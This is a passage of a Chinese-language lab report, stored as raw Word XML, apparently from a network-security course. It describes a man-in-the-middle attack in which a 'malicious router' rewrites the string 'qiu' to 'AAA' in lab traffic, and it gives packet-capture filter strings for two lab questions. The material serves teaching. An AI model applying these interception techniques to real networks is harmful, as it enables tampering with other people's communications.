          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58013463" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>目的主机</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143A7CF" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="145" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E3EC91A" wp14:editId="39B5C688">
            <wp:extent cx="3939540" cy="861060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="531" name="Picture 531"/>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27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3939540" cy="861060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8994FA" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>恶意路由器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825206C" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="186" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8E3251" wp14:editId="232CF7EA">
            <wp:extent cx="5273040" cy="2793492"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="2793492"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359B4C3" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="471"/>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到被攻击主机发送的信息中</w:t>
      </w:r>
      <w:r>
        <w:t>“qiu”</w:t>
      </w:r>
      <w:r>
        <w:t>字符串全部改变为</w:t>
      </w:r>
      <w:r>
        <w:t>“AAA”</w:t>
      </w:r>
      <w:r>
        <w:t>，说明我们的中间人攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33787B67" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>问题回答</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3022DABD" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4:</w:t>
      </w:r>
      <w:r>
        <w:t>在你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:t>计划中，你只需要捕捉一个方向的流量。请指出哪个方向，并解释原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E409A" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="586" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>将代码中过滤器分别修改为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7139C6" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="586" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>f = 'tcp and ether src 02:42:0a:09:00:05'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC23500" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="586" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>f = 'tcp and ether dst 02:42:0a:09:00:05'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24781333" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="298" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:t>代表只捕获来自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址为被攻击主机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcp </w:t>
      </w:r>
      <w:r>
        <w:t>流量，（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>代表只捕获发送至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址为被攻击主机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcp </w:t>
      </w:r>
      <w:r>
        <w:t>流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8548F8" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>经试验，使用过滤（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>）时攻击结果与之前攻击结果相同，这里不再介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4D29D5" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="298" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>使用过滤（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>）时会发现中间人攻击失效，攻击结果如下：被攻击主机输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AC51E" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="121" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="288" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F2F7F1D" wp14:editId="2C2C2A5E">
            <wp:extent cx="4686300" cy="891540"/>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29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686300" cy="891540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0378E9BE" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="298" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>目的主机无输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABC955" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="288" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35621FC8" wp14:editId="106A0803">
            <wp:extent cx="3672840" cy="348996"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="612" name="Picture 612"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="612" name="Picture 612"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3672840" cy="348996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69579B44" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="298" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>恶意路由器无数据包发送：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC744A" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="193" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="288" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC21216" wp14:editId="063CBC46">
            <wp:extent cx="4389120" cy="601980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="615" name="Picture 615"/>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31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4389120" cy="601980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A362CFF" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="288" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>实验结果显示中间人攻击只需要捕获从被攻击主机（即客户端）到目的主机（即服务端）的流量，捕获从目的主机到被攻击主机的流量没有作用，无法实现中间人攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6924FA" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="299"/>
        <w:ind w:left="288" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>推测原因为我们的恶意路由器关闭了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">ip </w:t>
      </w:r>
      <w:r>
        <w:t>转发的功能，如果只捕获从目的主机到被攻击主机的流量，</w:t>
      </w:r>
      <w:r>
        <w:t>恶意路由器接收到来自被攻击主机的数据包后，不会发送数据包给目的主机，导致目的主机根本没有接收到流量，也不会往被攻击主机发送流量，所以我们应该捕获从被攻击主机到目的主机的流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC6BB4" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5:</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:t>程序中，当您从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A(10.9.0.5)</w:t>
      </w:r>
      <w:r>
        <w:t>捕获</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nc </w:t>
      </w:r>
      <w:r>
        <w:t>流量时，您可以在过滤器中使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:t>地址或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:t>地址。其中一个选择不好，会产生问题，尽管两个选择都可能奏效。请两者都试一试，用你的实验结果来说明哪个选择是正确的，并请解释你的结论。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167CACEA" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>上述实验中我们已经通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:t>地址过滤来实现程序了，攻击可以正常进</w:t>
      </w:r>
      <w:r>
        <w:t>行。将过滤修改为使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:t>地址，即令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> f = 'tcp and host 10.9.0.5'</w:t>
      </w:r>
      <w:r>
        <w:t>。重复攻击，结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48023C4A" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="152" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="630F7A95" wp14:editId="63DE85F6">
                <wp:extent cx="4640580" cy="1473708"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4117" name="Group 4117"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4640580" cy="1473708"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4640580" cy="1473708"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="668" name="Picture 668"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4640580" cy="710184"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="670" name="Picture 670"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="822960"/>
                            <a:ext cx="3924300" cy="650748"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <w:pict>
              <v:group id="Group 4117" style="width:365.4pt;height:116.04pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="46405,14737">
                <v:shape id="Picture 668" style="position:absolute;width:46405;height:7101;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId34"/>
                </v:shape>
                <v:shape id="Picture 670" style="position:absolute;width:39243;height:6507;left:0;top:8229;" filled="f">
                  <v:imagedata r:id="rId35"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFADF7" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>可以发现攻击可以正常进行，</w:t>
      </w:r>
      <w:r>
        <w:t>“qiu”</w:t>
      </w:r>
      <w:r>
        <w:t>字符串被成功替换。但是我们也发现了问题，前面我们使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址过滤时，我们每发送一行信息，恶意路由器也发送一个数据包，但是使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip</w:t>
      </w:r>
      <w:r>
        <w:t>地址过滤时，恶意路由器会不停地发送数据包，这会浪费我们的性能，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251905A" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址进行过滤时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BD2AB" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="157" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC6146B" wp14:editId="4C0A35D8">
            <wp:extent cx="5074920" cy="1828800"/>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36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5074920" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DBB45" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip </w:t>
      </w:r>
      <w:r>
        <w:t>地址进行过滤时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6150B" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="119" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC08BBE" wp14:editId="7BBDBD8E">
            <wp:extent cx="4465320" cy="2676144"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="703" name="Picture 703"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="703" name="Picture 703"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4465320" cy="2676144"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C520BB4" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>恶意路由器不停发送数据包的原因是我们的程序不仅捕获来自被攻击主机的数据包，还捕获了恶意路由器修改后发送的数据包，这样不停地捕获自己发送的数据包再发送，造成了程序不停发送数据包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2297E7E3" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>因此，我们应该想办法过滤掉程序自己发送的数据包。来自被攻击主机的数据包和我们伪造的数据包</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip </w:t>
      </w:r>
      <w:r>
        <w:t>地址都是一样的，因此我们过滤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip </w:t>
      </w:r>
      <w:r>
        <w:t>是没有效果的。但是来自被攻击主机的数据包和恶意路由器发送的数据包的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址信息是不一样的。所以，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址才能起到过滤的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7ADBB" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>综上，两种过滤都能成功攻击，但是我们应该选择通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地</w:t>
      </w:r>
      <w:r>
        <w:t>址进行过滤，防止路由器不停捕获自己发送的数据包，浪费系统资源。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00773F28">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1477" w:right="1660" w:bottom="1705"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KaiTi">
    <w:altName w:val="KaiTi"/>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A315C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE60042A"/>
    <w:lvl w:ilvl="0" w:tplc="2FA41458">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="25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FB6C268E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="122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74AE9A6A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="194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480A38A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="266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9FA75D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="338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7AC667AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="410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A0C42FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="482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B4E61D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="554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EE23138">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="626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56221F26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60E0E238"/>
    <w:lvl w:ilvl="0" w:tplc="0BDC4AC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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703ADCD0">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BAD2AAA4">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D7B6D9AA">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C6948ED2">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8AEABA7E">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FE0EE3E2">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1A8231CC">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C3AAC246">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F28"/>
    <w:rsid w:val="00773F28"/>
    <w:rsid w:val="00C228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76419"/>
  <w15:docId w15:val="{36C5E481-4A3D-4CD9-A857-6D3E12753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251" w:lineRule="auto"/>
      <w:ind w:left="10" w:right="2986" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="221" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="59" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
